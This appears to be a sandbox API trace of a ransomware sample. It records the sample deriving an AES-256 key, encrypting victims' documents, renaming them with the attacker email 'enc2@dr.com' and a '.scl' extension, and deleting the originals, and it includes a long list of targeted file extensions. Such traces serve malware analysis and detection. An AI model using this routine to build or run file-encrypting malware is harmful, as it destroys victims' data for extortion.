	[0187.551] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0187.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.554] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0187.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.555] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0187.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.555] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9530) returned 1
	[0187.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.555] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x12cf1, dwBufLen=0x12cf1 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x12d00) returned 1
	[0187.560] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.560] RtlMoveMemory (in: Destination=0xfefe80, Source=0xfdd180, Length=0x12cf1 | out: Destination=0xfefe80) 
	[0187.560] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.561] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfefe80*, pdwDataLen=0x18aefc*=0x12cf1, dwBufLen=0x12d00 | out: pbData=0xfefe80*, pdwDataLen=0x18aefc*=0x12d00) returned 1
	[0187.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.561] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0187.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.561] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0187.562] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.562] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0187.562] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.562] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.563] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.563] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0187.565] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 108
	[0187.565] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0187.566] WriteFile (in: hFile=0x388, lpBuffer=0xfefe80*, nNumberOfBytesToWrite=0x12d00, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfefe80*, lpNumberOfBytesWritten=0x18b358*=0x12d00, lpOverlapped=0x0) returned 1
	[0187.572] CloseHandle (hObject=0x388) returned 1
	[0187.575] CloseHandle (hObject=0x2c0) returned 1
	[0187.575] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt")) returned 1
	[0187.582] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt")) returned 0
	[0187.582] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43bd55d0, ftCreationTime.dwHighDateTime=0x1d966f6, ftLastAccessTime.dwLowDateTime=0x5d68940, ftLastAccessTime.dwHighDateTime=0x1d96754, ftLastWriteTime.dwLowDateTime=0x5d68940, ftLastWriteTime.dwHighDateTime=0x1d96754, nFileSizeHigh=0x0, nFileSizeLow=0xcaf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="A4j36W_yZqHx9oIq.odp", cAlternateFileName="A4J36W~1.ODP")) returned 1
	[0187.582] lstrcmpW (lpString1="A4j36W_yZqHx9oIq.odp", lpString2="..") returned 1
	[0187.583] lstrcmpW (lpString1="A4j36W_yZqHx9oIq.odp", lpString2=".") returned 1
	[0187.583] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.583] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="A4j36W_yZqHx9oIq.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\A4j36W_yZqHx9oIq.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\A4j36W_yZqHx9oIq.odp"
	[0187.583] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\A4j36W_yZqHx9oIq.odp") returned 72
	[0187.583] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.583] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\A4j36W_yZqHx9oIq.odp", cchLength=0x48 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp") returned 0x48
	[0187.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.584] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0187.584] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp"
	[0187.584] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp") returned 72
	[0187.584] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.585] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0187.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.585] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0187.585] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.586] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.586] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0187.666] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xcaf5, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xcaf5, lpOverlapped=0x0) returned 1
	[0187.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.670] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0187.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.673] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0187.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.673] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0187.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.674] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90b0) returned 1
	[0187.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.674] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xcaf5, dwBufLen=0xcaf5 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xcb00) returned 1
	[0187.676] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.676] RtlMoveMemory (in: Destination=0xfe9c80, Source=0xfdd180, Length=0xcaf5 | out: Destination=0xfe9c80) 
	[0187.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.676] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9c80*, pdwDataLen=0x18aefc*=0xcaf5, dwBufLen=0xcb00 | out: pbData=0xfe9c80*, pdwDataLen=0x18aefc*=0xcb00) returned 1
	[0187.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.677] CryptDestroyKey (hKey=0xfb90b0) returned 1
	[0187.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.677] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0187.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.677] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0187.677] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.678] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.678] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.678] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
